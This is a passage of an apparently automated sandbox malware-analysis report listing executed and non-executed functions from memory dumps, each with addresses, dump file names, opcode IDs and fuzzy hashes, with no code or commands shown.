                                                            • Instruction Fuzzy Hash: 0FD09510B0F50385F2F84A1280F033EA1A1AF0A78AE60013FC29FC19C5CA2CB902B203
                                                            Function 00007FFD348B4C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0a0b178df8a853ecf44213e8b4c7d261b00bccbbc3d75b2413b882f2b67df8e
                                                            • Instruction ID: 6ef7c16c5ac49b1e03ad662085d51d9854c53450f4edfbe36d25fb5cea7a7033
                                                            • Opcode Fuzzy Hash: c0a0b178df8a853ecf44213e8b4c7d261b00bccbbc3d75b2413b882f2b67df8e
                                                            • Instruction Fuzzy Hash: F7C08C00F08C5646F2A4628400312BE04064F88304F644430E10EEB3C7CD6C2D0202C6
                                                            Function 00007FFD348B06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: a84eed44f54335c228166c2b680a71cf7003e3d9a047fb829d510b8d8adaef60
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 23B01200E5A40F08A404337E08D20A470405B47100FC000B0D60EC00819CCD249422C2
                                                            Function 00007FFD348B1FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 46483bb4b5e4ee59b5de81c9b5a2aa8061e20f852aa1730399efe1ce38cac06f
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 90C02B30F0C40C44E734433048520FB32014F47304F0542F1810BFB082CC3C1C003180
                                                            Function 00007FFD34CA0191 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77e8028ad7257f300313975090e251458c7ce4702a3d98d21782e4a3c9e41d50
                                                            • Instruction ID: 1104f6219214bad53ee0bc150a45b7572693a3c81e87ad9833675077e0b6c295
                                                            • Opcode Fuzzy Hash: 77e8028ad7257f300313975090e251458c7ce4702a3d98d21782e4a3c9e41d50
                                                            • Instruction Fuzzy Hash: 92B00205F0E60757B5651CA544FA17D05514B4A7C9E940936975AC61C6DC5C28447161

                                                            Non-executed Functions

                                                            Function 00007FFD348B09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 19f9022f087a140241641a209f260c8d6e5ad60b3058d73327d322ddeecc527c
                                                            • Instruction ID: 40787fd4f5c1e84265361780250e3d326b567a453aa7cccb4a766ba0eb3ec8f2
                                                            • Opcode Fuzzy Hash: 19f9022f087a140241641a209f260c8d6e5ad60b3058d73327d322ddeecc527c
                                                            • Instruction Fuzzy Hash: 5B418207B0D56A6AE22137FD75711FE6BA88F82375B0C6777E14C9A1C36CB8708182E5

                                                            Executed Functions

                                                            Function 00007FFD34880D4C Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5\_H
                                                            • API String ID: 0-3325266018
                                                            • Opcode ID: dd2f8c0b45bdd7132e241855dc3b8244ea70cbdd230bc23db8ed1a625a9d7f0a
                                                            • Instruction ID: ee64c9184921239c9320976e17d5ad98673bc4793daa2ffb351cff58b891a220
                                                            • Opcode Fuzzy Hash: dd2f8c0b45bdd7132e241855dc3b8244ea70cbdd230bc23db8ed1a625a9d7f0a
                                                            • Instruction Fuzzy Hash: 2791F275A0CA898FE799DB6C88B57A97FE1FF56310F0501BBD049D72D2DA792410C740
                                                            Function 00007FFD348807D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAw4
                                                            • API String ID: 0-1333154749
                                                            • Opcode ID: 9f508d8c67b159954c274a96bada799bf8eb18e5e6de62201f37b6f36ce2534b
                                                            • Instruction ID: 1de46d644310e21dfcdaab58d4442a1fc80496427a0d24b4bd410c26803ed85e
                                                            • Opcode Fuzzy Hash: 9f508d8c67b159954c274a96bada799bf8eb18e5e6de62201f37b6f36ce2534b
                                                            • Instruction Fuzzy Hash: 6B312421A0E6890FE7969B7888751E97FB1EF87310F0A41F7D549C70E3E92C69068791
                                                            Function 00007FFD348808D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72db52f290d04874447b1f39fa62e6fbe473464044a0ad89d30d73fa4471c644
                                                            • Instruction ID: 0ca73c73edd1712b34dde287604083391bcaaa3bb43feaafdda0e0897e45f42f
                                                            • Opcode Fuzzy Hash: 72db52f290d04874447b1f39fa62e6fbe473464044a0ad89d30d73fa4471c644
                                                            • Instruction Fuzzy Hash: 08411322B0C5251FE754B7FC60E96FE7795DF86321B0805BBD14DC71D3ED28A8818284
                                                            Function 00007FFD3488090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f5b4c66163c9a4051d57840cf6aea2f2112f01a89cea90088c6717ffb9e12d4
                                                            • Instruction ID: 70152f83c9713cb9fe973c396017b9eb7d9bba43671483cb218796b982f7bd6d
                                                            • Opcode Fuzzy Hash: 8f5b4c66163c9a4051d57840cf6aea2f2112f01a89cea90088c6717ffb9e12d4
                                                            • Instruction Fuzzy Hash: C841F422B0CA691FE754B7FC60EA6F977D5DF85321B0844BBD14DC71D3ED28A8818284
                                                            Function 00007FFD34880908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: 70285359ceed2f5cfd70f912deedf529b2c77f24fcc3d0751132b7e3a1c2fe30
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: B621EA3130CC184FE7A8EB1CE889DB977D1EF9A32171501BAE58EC7125E915EC8287C2
                                                            Function 00007FFD34884525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46503b981595aaa92a835d2bb8867a0cba22da3ecefed2c88197b9e0e50aef8a
                                                            • Instruction ID: 3ea17965b18d35a43510dd58715c2a1550a814eb4a6df65fb257ebef8c1a939b
                                                            • Opcode Fuzzy Hash: 46503b981595aaa92a835d2bb8867a0cba22da3ecefed2c88197b9e0e50aef8a
                                                            • Instruction Fuzzy Hash: AC312E61B08A1A8FFBD4EB2884A57BC6291FF5B700F5101B5D60ED7292EE2CAC40A701
                                                            Function 00007FFD3488116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7ef9e9f6768238f7ea5b1b011fbecf650828ba1776b137d57375e5955e32d71
                                                            • Instruction ID: a6df84fb89539bd106edce058beec5e281d4f5c0ec066f964ab006a306a51b0f
                                                            • Opcode Fuzzy Hash: b7ef9e9f6768238f7ea5b1b011fbecf650828ba1776b137d57375e5955e32d71
                                                            • Instruction Fuzzy Hash: 9831C231A0C64A8FDB85EB68C8A4AB97BF0FF5A300F0545BAC009D7193DE29A841CB40
                                                            Function 00007FFD34880998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 856a706a8d41a28798b4bc1f65360d5f2ff9a2973e79b3dd68ae9886b7c032d3
                                                            • Instruction ID: 8c892e4b6463176cbd32300aba62e25a9456017d09958f468c3d290b413a6d4d
                                                            • Opcode Fuzzy Hash: 856a706a8d41a28798b4bc1f65360d5f2ff9a2973e79b3dd68ae9886b7c032d3
                                                            • Instruction Fuzzy Hash: CD21F920F189290FE7D8A76C94EA6B976C2EF9A311F1404BEE50DC33E3DD2CAC414680
                                                            Function 00007FFD34880C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccb7f1236071498c6c3dbf7838631356e928c3427a217ba8039be87cad0a387f
                                                            • Instruction ID: 2b2ad6a92988a750c17788c4ad80bf35f19ff7e80308d65c27a75c53f482908a
                                                            • Opcode Fuzzy Hash: ccb7f1236071498c6c3dbf7838631356e928c3427a217ba8039be87cad0a387f
                                                            • Instruction Fuzzy Hash: 7621F636B0D3499FE722ABA898A10ED7B64EF53320F0941B3D148DB083D93C65469281
                                                            Function 00007FFD34880C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 086c387e16eac254c0ff958986515dec3e2a822fca919b574909c25606533031
                                                            • Instruction ID: e751564e55bef74b10a85b411fffc1681fa7855d7c8ddb744b9c543b236f5877
                                                            • Opcode Fuzzy Hash: 086c387e16eac254c0ff958986515dec3e2a822fca919b574909c25606533031
                                                            • Instruction Fuzzy Hash: F211A036B0D3899FE752DF6888A10ED7BB1EF63310F1641B6D144DB182D93C6A069780
                                                            Function 00007FFD34885721 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b99592face9f2cdfd70a1be8703941ee31b238e5f3eb900805d432c32c0978c
                                                            • Instruction ID: 4c33cdc28c7ffe5127b65fa029573eaa1dd65b5ff7e29f99e49a78a7141035a7
                                                            • Opcode Fuzzy Hash: 6b99592face9f2cdfd70a1be8703941ee31b238e5f3eb900805d432c32c0978c
                                                            • Instruction Fuzzy Hash: C0110D31A08A09CFDF94EB44C494BAD77F2EB58314F15416AC00ED7290CB79A981DF44
                                                            Function 00007FFD34880C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cd51ebbc09b2d613443ec980bc1f8bf1f82066cc4278dba8b329ce02149857d
                                                            • Instruction ID: 68fbb5cf44d58e27acb8ab6fdb710b9002774e3ea7e8ebb43374eeb3ff830aac
                                                            • Opcode Fuzzy Hash: 1cd51ebbc09b2d613443ec980bc1f8bf1f82066cc4278dba8b329ce02149857d
                                                            • Instruction Fuzzy Hash: 6F11AD36F0E3899FE752DF6888A10DD7BB1EF63310F1641B6D144DB192DA3C6A469780
                                                            Function 00007FFD34880C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 220b1bd2ff826bf319197f4d4ce75a1355b63edd3784d07e0b8da15d275b1d82
                                                            • Instruction ID: 88817f74e73ca8eff9947524353eae456bcd51254a658c1b1d16517b05e232c6
                                                            • Opcode Fuzzy Hash: 220b1bd2ff826bf319197f4d4ce75a1355b63edd3784d07e0b8da15d275b1d82
                                                            • Instruction Fuzzy Hash: E6018F35E0E3899FEB92DF6888A009D7FB1EF53310F1941F6D544DB182DA3C6A459741
                                                            Function 00007FFD34884635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 5e6ed63707f2bc9010a52eb4e2c9ffbff020a37b71ab709fd5c91ace5f0ca8de
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 92F0EC31A5861E8EFB95EB40C8E47FC73A1FF96701F5101B5C60AD72A1EF2C69809A40
                                                            Function 00007FFD348845BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 8343f5062eed9c74904eb9f81b43a2e41c1ca57b2e55f66b9b41351d5dce8de2
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: 03F05E31B0860A4EFBD0EB00C8E46FC2391FF57700F110175CA4ED72A2EE2C69409640
                                                            Function 00007FFD348806F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9f741c335bb81b8b3a2a43d825f713628b01fad9ca8297cef718fb09dcc1cf7
                                                            • Instruction ID: d58d711ea841102f258a18b2b8651d245ffca8f77631bb9eff4bbb6ec4cac126
                                                            • Opcode Fuzzy Hash: b9f741c335bb81b8b3a2a43d825f713628b01fad9ca8297cef718fb09dcc1cf7
                                                            • Instruction Fuzzy Hash: 32E02001D4E34606E642337D14F209D7A141F93214F9A0073D65CD7093B88E30982652
                                                            Function 00007FFD34882E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: c1d02840d9a666f4995035e8093ea6d6ce33b2184c62f3e1b7bfaf042cd1ae2f
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: C5E01A60F0910686FBD4A744D8A0BA963A5EF8A310F151078EB8EE33C1CD2CAD409B06
                                                            Function 00007FFD3488F1C8 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: 36f2b58407e9d2a6cc7dc351823ca5c3e6900f0993e5c88492aa9b423cd7ef42
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 9DD02E306209084BCB08EF38C88E034B3D1FB89202F89C1BA904EC2660CFA998814301
                                                            Function 00007FFD34880B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: 49bef44c0f700b659f394c1f9259385413ad8498f9c99b1b2cb0522be9a06a65
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: 74D0A930228A4E8FDA40B738C98A8247BA0FF0F211FC910E1E008C71A2D60888A98701
                                                            Function 00007FFD348806A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 8ddbb976a66202f55149dd32f9ea4020d02bb0e0f5a02c47a6fa3b509c30d369
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 0FC04C05F5A71F01F895B76E58E60ACA1405FD7610FE70172D75DD00D19C4D20D52156
                                                            Function 00007FFD348812B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: d1ef27e4795d0e75ae104c569a6eb725a0fad397ce6631010fd1dc71705e173c
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 66C04C345518098FC948EB29C89595477A0FB1A315BD50094E409C71B1D65EDCD5D781
                                                            Function 00007FFD34884C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 315a8956e3c4772883f884b838e789815bf3e115211e79c393b38d07ce65fa63
                                                            • Instruction ID: c7a925d025d3ffdead47d6814ce12209f9fef6ebd2a946efb145c35c31248fe3
                                                            • Opcode Fuzzy Hash: 315a8956e3c4772883f884b838e789815bf3e115211e79c393b38d07ce65fa63
                                                            • Instruction Fuzzy Hash: 4DC08C00F08C1642F2E4628400702BD04465F84300F444030E10DE73C6CD2C2D0102C6
                                                            Function 00007FFD348806C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: fba0a12d1462d69a08b1b952731c0dd55b688864278d5d6a8c0d81164f21f6f9
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 47B01200E5640F00E484337E0CD206470405F87100FC200B0E61DC0091984D20942242
                                                            Function 00007FFD34881FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 657dfeefb8f3552e451ccc42076080edbdcd709b8c07c09cc7e21a78981d4bb4
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 5EC02230F0800C80EBA8833088A20FA33028F83308F0A82F2C20AFB083CC3C28003200

                                                            Non-executed Functions

                                                            Function 00007FFD348809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2630615088.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_24_2_7ffd34880000_hPeZTHbzcsUskSflSyozwAqUA.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 569b4fc36500e7af5e94188623208a2a00e6a6757efb939b96c80f24fb28beb8
                                                            • Instruction ID: 1a80ca7b8298d169d405ac6e23cf83d0d4ff3ab342ca5e245abd64dc08468510
                                                            • Opcode Fuzzy Hash: 569b4fc36500e7af5e94188623208a2a00e6a6757efb939b96c80f24fb28beb8
